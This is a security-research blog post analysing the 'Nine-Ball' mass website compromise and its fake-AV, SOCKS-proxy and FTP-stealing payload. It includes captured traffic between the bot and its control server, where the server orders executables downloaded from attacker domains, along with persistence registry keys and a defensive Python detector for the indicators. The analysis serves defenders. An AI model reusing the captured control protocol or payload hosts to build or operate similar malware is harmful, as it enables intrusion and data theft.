Channel: Andrew Martin » fake av

Nine-Ball = Gumblar Redux? – 40,000 websites compromised


My RSS reader alerted me today to another wave of mass website compromises, this one reported by Websense. Hungry for more information, I decided to dig in and reveal the details that, as always, have been left out.

Summary

This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:

Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries

What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.

Details

Information on Websense’s site was sparse, but a quick Google search for the first part of the domain they referenced in their alert yielded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133, which is hosted by Eurohost out of Ukraine, an outfit I have run across many times before. I’ll probably post another article on these guys shortly.

inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA

This IP hosts many other domains associated with the attack:

sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw

When connecting to rnw.kz, a series of redirects takes place between the domains listed above. Cookies are created (probably so a victim is only infected once) to track victims and are passed on to the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty Wepawet was not successful in analysing the attack, as it was simply pointed at ask.com :(

After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].

A VM of mine was infected, and after loading Internet Explorer the malware lit up and did its thing. I’ve submitted a few files to VT but, to be honest, I haven’t had too much time to investigate and cover everything.

VirusTotal 1

VirusTotal 2

Binary Downloads, Ads and C&C communication

Interesting notes:

User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visible: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.

GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes
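To turn the captured beacons above into something a defender can run over proxy logs, here is an added Python example (mine, not code from the original post or from the malware) that flags requests matching the indicators on this page (the `socks` User-Agent, the trafficshop.tw gate scripts, the orep.tw and miosmschat.com binary fetches), decodes the `k=<size>_<name>` installed-component report from the second zc.php beacon, and splits a zc.php response into its `#U1:` download URLs and the other `#U<x>:` ad-template records. The log entries inside it are constructed samples shaped like a proxy log, not a real capture.

```python
import re
from urllib.parse import urlparse, parse_qs

# Indicators copied from the captures on this page; the log format is constructed.
C2_HOSTS = {"trafficshop.tw"}
C2_PATHS = {"/zub/zc.php", "/socks/gate/r.php", "/socks/gate/data.php"}
PAYLOAD_HOSTS = {"orep.tw", "miosmschat.com"}
BOT_UA = "socks"  # the bot's own User-Agent string in the capture

def classify_request(url, user_agent):
    """Reason string if a request matches the bot's beaconing or payload fetches, else None."""
    u = urlparse(url)
    host = u.hostname or ""
    if user_agent == BOT_UA:          # strong on its own, regardless of destination
        return "bot user-agent 'socks'"
    if host in C2_HOSTS and u.path in C2_PATHS:
        return f"C&C gate {host}{u.path}"
    if host in PAYLOAD_HOSTS and u.path.endswith(".exe"):
        return f"payload download from {host}"
    return None

def installed_components(url):
    """Decode the k=<size>_<name>,... report in the second zc.php beacon to [(name, size)]."""
    k = parse_qs(urlparse(url).query).get("k", [""])[0]
    parts = [item.partition("_") for item in k.split(",") if item]
    return [(name, int(size)) for size, _, name in parts]

def parse_c2_response(body):
    """Split a zc.php response into '#U1:' download URLs and other '#U<x>:' records (ad templates ending in '%%')."""
    downloads, templates = [], []
    for line in body.splitlines():
        m = re.match(r"#U(.):(.*)$", line)
        if not m:
            continue  # skips the PHP debris (Array dump, leaked SQL) seen in the capture
        kind, payload = m.groups()
        if kind == "1":
            downloads.append(payload.strip())
        else:
            templates.append((kind, payload.rstrip("%")))
    return {"downloads": downloads, "templates": templates}

# Constructed sample (url, user_agent) pairs shaped like a proxy log, not a real capture.
SAMPLE_LOG = [
    ("http://trafficshop.tw/zub/zc.php?l=US&v=3.15.3&k=200704_socks.exe,11264_ic.exe", "socks"),
    ("http://orep.tw/socks.exe", "Mozilla"),
    ("http://www.example.com/", "Mozilla/5.0"),
]

def scan(log=SAMPLE_LOG):
    return [(url, r) for url, ua in log if (r := classify_request(url, ua))]
```

Feed `scan()` real (url, user_agent) pairs from your proxy or IDS export; `parse_c2_response()` is for the response bodies if you have full-content captures.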

Other interesting network traffic

GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache

POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache

s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html

iogeelhchqhogmhgggdccnghdqdk

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300

HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html

Files & Reg Keys

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”

C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmp
C:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)

Other notable behavior

The malware tries to overwrite user32.dll, triggering Windows File Protection. My VM bluescreened a couple of times during analysis, which means victims are probably suffering the same problem. The malware also installs WinPcap and hides its presence by deleting various reg keys and the WinPcap uninstaller.

